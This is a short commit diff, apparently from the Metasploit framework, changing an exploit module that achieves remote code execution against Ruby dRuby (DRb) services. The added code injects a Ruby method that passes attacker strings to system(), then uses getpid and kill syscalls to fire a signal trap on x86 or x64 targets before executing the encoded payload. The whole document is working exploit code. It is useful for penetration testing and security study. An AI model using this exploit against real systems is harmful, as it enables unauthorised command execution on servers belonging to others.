add back kill syscall for trap method

Author: busterb

modules/exploits/linux/misc/drb_remote_codeexec.rb

@@ -41,7 +41,6 @@ def initialize(info = {})
       'DisclosureDate' => 'Mar 23 2011',
       'DefaultTarget' => 0))
 
-
       register_options(
         [
           OptString.new('URI',
@@ -54,6 +53,15 @@ def initialize(info = {})
   def method_trap(p)
     p.send(:trap, 23,
       :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+    # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
+    begin
+      pid = p.send(:syscall, 20)
+      p.send(:syscall, 37, pid, 23)
+    rescue Errno::EBADF
+      # 64 bit system
+      pid = p.send(:syscall, 39)
+      p.send(:syscall, 62, pid, 23)
+    end
     p.send(:my_eval, payload.encoded)
   end